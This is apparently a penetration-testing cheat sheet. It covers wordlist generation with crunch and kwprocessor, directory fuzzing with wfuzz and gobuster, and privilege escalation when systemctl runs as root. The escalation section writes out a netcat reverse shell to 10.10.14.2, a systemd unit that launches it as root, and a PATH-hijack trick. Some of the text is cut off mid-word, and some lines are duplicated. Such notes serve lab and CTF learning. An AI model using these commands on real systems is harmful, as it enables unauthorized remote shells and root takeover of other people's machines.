Steinz Security

Good Post: Bruteforcing using Custom Scripts Crunch: crunch 8 8 -t Any_Characers -o list.txt if you want to create something like Bha!!123 crunch 8 8 -t ,@@^^%%% , = Upper case letter @=lower case letters ^ = special characters %= numbers Generating Wordlist using kwprocessor this is used for generating random passwords that users might use as a streak on the keyboard example: qwertyuiop[]\ git clone https://github.com/hashcat/kwprocessor.git #Create a keyword based on routes users use to create passwords ./kwp basechars/full.base keymaps/en-gb.keymap routes/2-to-16-max-3-direction-changes.route > kwp.txt Fuzzing for Webpages wfuzz -c -w Rockyou.txt -z list,txt-php-html -u http://10.10.10.10/admin/FUZZ.FUZ2Z --hc 404,403 -t 100 #show all responses except 404; -s --> negative responses gobuster dir --url http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -s 404 #Fuzzing Webpages ; -b negative responses; -k --> ignore ce

This can be done when you find system ctl is running as root. so we need to create my own service. that can be done by METHOD - I Create a file named test.sh in Target Machine rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9002 >/tmp/f   save it as test.sh → copy the file to /home/bhanu/test.sh chmod +x test.sh    now create a new service: → save it as mys.service [Unit] Description=Example systemd service. [Service] Type=simple ExecStart=/bin/bash /home/bhanu/test.sh [Install] WantedBy=multi-user.target systemctl enable enable /home/bhanu/mys.service    open a new terminal in kali: nc -nvlp 9002  In Victim machine systemctl start mys.service METHOD - I This can be achieved by adding a new path when systemctl is running as root.    echo $PATH systemctl //runs the original systemctl cd /tmp nano systemctl bash //Add bash in systemctl file  PATH=/tmp:$PATH export PATH